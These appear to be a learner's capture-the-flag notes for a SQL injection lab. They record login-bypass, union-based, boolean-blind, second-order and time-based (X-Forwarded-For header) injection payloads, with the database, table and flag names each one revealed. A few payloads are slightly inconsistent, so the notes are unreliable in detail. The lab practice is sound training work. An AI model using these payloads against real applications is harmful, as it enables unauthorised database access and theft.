-------------Login Form---------------
Username:
	ali' or 1=1--		didn't work
	ali' or 1=1-- - 	(logged in successfully)
	ali' or 1=1#		(logged in successfully
so, DBMS is MySQL


-------------View the post------------  (http://10.201.25.202/post?id=2)
Expected Queyr: SELECT .... FROM posts WHERE id=<id>

***Analyzing***
2 order by 5-- -	(Unknown column '5' in 'order clause', so there are only '4' columns returns in the query result)

2 union select 'a','a','a','a'-- -	('a' dosen't display on the web app)
	
Try query the post id that doesn't exist:
					40 union select 1,2,3,4-- -		('2' & '3' displayed on the web app)					
Determine the versin of the MySQL DBMS
	40 union select 1,2,VERSION(),4-- -			( 8.0.23-0ubuntu0.20.04.1 )


	
***List the Databases***
40 union select 1,2,group_concat(schema_name),4 from information_schema.schemata;-- -		( information_schema,sqhell_5 )


***List the tables***
40 union select 1,2,group_concat(table_name),4 from information_schema.tables where table_schema='sqhell_5';-- -	( flag,posts,users )


***List the 'flag' columns name***
40 union select 1,2,group_concat(column_name),4 from information_schema.columns where table_name='flag';-- -		( id,flag )


***Dump the data***
40 union select 1,2,group_concat(id,"~",flag),4 from flag-- -


------------Registration form username avialable or not functionality-----------------
***Analyze***
if 
   TRUE: username alreay taken -> ali' or 1=1-- -
   FALSE: username available   -> ali' or 1=2-- -



***Identify the Length of the database***
ali' or (SELECT length(schema_name) from information_schema.schemata limit 1)='18'-- -		(username already taken) so, the first db name length is: 18
ali' or (SELECT length(schema_name) from information_schema.schemata limit 1,1)='8'-- -		(username already taken) so, the second database name lenght is: 8

***Determine the 2nd db name whose length is '8'***
1st chr -> ali' or SUBSTRING((SELECT schema_name from information_schema.schemata limit 1,1),1,1)='s'-- - 	-> 's'
+ 2nd chr -> ali' or SUBSTRING((SELECT schema_name from information_schema.schemata limit 1),2,1)='q'-- -       -> 'sq'
+ 3rd chr -> ali' or SUBSTRING((SELECT schema_name from information_schema.schemata limit 1),3,1)='h'-- -       -> 'sqh'
+ 4th chr -> ali' or SUBSTRING((SELECT schema_name from information_schema.schemata limit 1),4,1)='e'-- -       -> 'sqhe'
+ 5th chr -> ali' or SUBSTRING((SELECT schema_name from information_schema.schemata limit 1),5,1)='l'-- -       -> 'sqhel'
+ 6th chr -> ali' or SUBSTRING((SELECT schema_name from information_schema.schemata limit 1),6,1)='l'-- -       -> 'sqhell'
+ 7th chr -> ali' or SUBSTRING((SELECT schema_name from information_schema.schemata limit 1),7,1)='_'-- -       -> 'sqhell_'
+ 8th chr -> ali' or SUBSTRING((SELECT schema_name from information_schema.schemata limit 1,1),8,1)='3'-- -     -> 'sqhell_3'
database name is 'sqhell_3'


***Identify the Length of the tables in 'sqhell_3' database***
ali' or (SELECT length(table_name) from information_schema.tables where table_schema='sqhell_3' limit 1)='4';-- -	(username already taken) so, the first table name length is: 4

***Determine the 1st table name which has length '4'***
ali' or SUBSTRING((SELECT table_name from information_schema.tables where table_schema='sqhell_3' limit 1),1,1)='f';-- -	-> 'f'
ali' or SUBSTRING((SELECT table_name from information_schema.tables where table_schema='sqhell_3' limit 1),2,1)='l';-- -	-> 'fl'
ali' or SUBSTRING((SELECT table_name from information_schema.tables where table_schema='sqhell_3' limit 1),3,1)='a';-- -	-> 'fla'
ali' or SUBSTRING((SELECT table_name from information_schema.tables where table_schema='sqhell_3' limit 1),4,1)='g';-- -	-> 'flag'
table name is 'flag'


***Identify the length of the columns in 'flag' table***
1st column -> ali' or (SELECT length(column_name) FROM information_schema.columns WHERE table_name = 'flag' limit 1)='4';-- -	  so, length of first column name is: 4
2nd column -> ali' or (SELECT length(column_name) FROM information_schema.columns WHERE table_name = 'flag' limit 1,1)='2';-- -	  so, length of first column name is: 2

***Identify the 1st column name which has length '4'***
ali' or SUBSTRING((SELECT column_name FROM information_schema.columns WHERE table_name = 'flag' limit 1),1,1)='f';-- -		-> 'f'
ali' or SUBSTRING((SELECT column_name FROM information_schema.columns WHERE table_name = 'flag' limit 1),2,1)='l';-- -		-> 'fl'
ali' or SUBSTRING((SELECT column_name FROM information_schema.columns WHERE table_name = 'flag' limit 1),3,1)='a';-- -		-> 'fla'
ali' or SUBSTRING((SELECT column_name FROM information_schema.columns WHERE table_name = 'flag' limit 1),4,1)='g';-- -		-> 'flag'
first column name is 'flag'

ali' or SUBSTRING((SELECT column_name FROM information_schema.columns WHERE table_name = 'flag' limit 1,1),1,1)='i';-- -		-> 'i'
ali' or SUBSTRING((SELECT column_name FROM information_schema.columns WHERE table_name = 'flag' limit 1,1),2,1)='d';-- -		-> 'id'
2nd column name is 'id'

***Determine the length of the cell values in 'flag' column***
1st cell length -> ali' or (SELECT length(flag) FROM flag limit 1)='43';-- -	so, length of 1st cell value is: 43

***Identify the value stored in 1st cell of 'flag' column from 'flag' table which has length '43'***
ali' or SUBSTRING((SELECT flag FROM flag limit 1),1,1)='T';-- -
.......
.......
.......

ali' or (SELECT flag FROM flag limit 1)='THM{FLAG3:XXXXXXXXXXXXXXXXXXXX}';-- -		(username already taken)


----------------Admin Users profile-----------------------
Expected query: select .... from users where id=1;


No. of column returns:
	1 order by 2-- -
	1 order by 3-- -
	1 order by 4-- -	(error, so there only 3 columns query returns in result)

So, Expected query becomes:
	select id, username, posts from users where id=1;

union attack
	1 union select 'a','b','c'-- -		(query executed successfully, but union output didn't displayed)	

Injecting false userid:
	2 union select 'a','b','c'-- -		(no error & union query output displayed, even after injecting the user id that doesn't exist)

How this web app behaves on the result of query?
	id = user input at 'user?id=' parameter
	posts = sql(select ..... from posts where id=<value of id field>)


So, in union injection, try inject another query in place of the 'id' field value, which will be executed at second query(posts fetching query):
	2 union select '1 union select null','b','c'-- -
		This is what happens on web application:	
			id = 1 union select null
			posts = sql(1 union select null)	(didn't work, maybe the second query returns more than one column)
		
	2 union select "1 union select null,null",'b','c'-- -	(didn't work)
	2 union select "1 union select null,null,null",'b','c'-- -	(didn't work)
	2 union select "1 union select null,null,null,null",'b','c'-- -		(worked bcz 'posts' section contains an additional post bullet item, so second query returns 4 columns in result)

Now, fetching the flag:
	2 union select "1 union select null,flag,null,null from flag",null,null;-- -


--------------Web app logs the IP address, so injecting at 'X-Forwarded-For' header-------------
Injection at http header: X-Forwarded-For

analyzing:
	X-Forwarded-For: 127.0.0.1' union select sleep(10),null,null;-- -	(working, so vulnerable to time-based sqli & reqult of original query contains the 3 columns)



***Determine the length of databases***
' union select sleep(10),null,null from information_schema.schemata where length(schema_name) = '18';-- -					--> so, length of 1st database is: '18'
' union select sleep(10),null,null from information_schema.schemata where length(schema_name) != '18' and length(schema_name) = '8';-- -	--> so, length of 2nd database name is: '8'

***Identify the databases name***
' union select sleep(10),null,null from information_schema.schemata where schema_name like 's%';-- -	--> worked: 's'
' union select sleep(10),null,null from information_schema.schemata where schema_name like 'sq%';-- -	--> worked: 'sq'
....
....
' union select sleep(10),null,null from information_schema.schemata where schema_name like 'sqhell_1%';-- -	(worked)
' union select sleep(10),null,null from information_schema.schemata where schema_name = 'sqhell_1';-- -		(worked, so db name is: 'sqhell_1')

[+] DB name is: 'sqhell_1'


***Determine the length of tables in 'sqhell_1' database***
' UNION SELECT sleep(3),null,null FROM information_schema.tables WHERE length(table_name) = '4' and table_schema = 'sqhell_1';-- - 							--> length of 1st table name is: '4'
similary find length of other database:


***Identify the table name having length '4'***
' UNION SELECT sleep(3),null,null FROM information_schema.tables WHERE table_name like 'flag%' and table_schema = 'sqhell_1' and length(table_name) = '4';-- -		(working)

[+] 'flag' table found


***Identify the length(column name) from 'flag' table***
' UNION SELECT sleep(3),null,null FROM information_schema.columns WHERE table_name = 'flag' and table_schema = 'sqhell_1' and length(column_name) = '4' limit 1;-- -		--> (working) so, length 1st column name is: '4'

***Determine the column from 'flag' table, having length '4'***
' UNION SELECT sleep(8),null,null FROM information_schema.columns WHERE table_name = 'flag' and table_schema = 'sqhell_1' and length(column_name) = '4' and column_name like 'flag%' limit 1;-- -	(worked)

[+] 'flag' column found

***Determine the length(cell value) of 'flag' column stored in 'flag' table***
' UNION SELECT sleep(3),null,null FROM flag WHERE length(flag) = '43' limit 1;-- -	(worked), so length of 1st cell is: '43'


***Extract the cell value of 'flag' column stored in 'flag' table***
' UNION SELECT sleep(3),null,null FROM flag WHERE substring(flag,1,1) = 'T';-- -
' UNION SELECT sleep(3),null,null FROM flag WHERE substring(flag,2,1) = 'TH';-- -
....
....

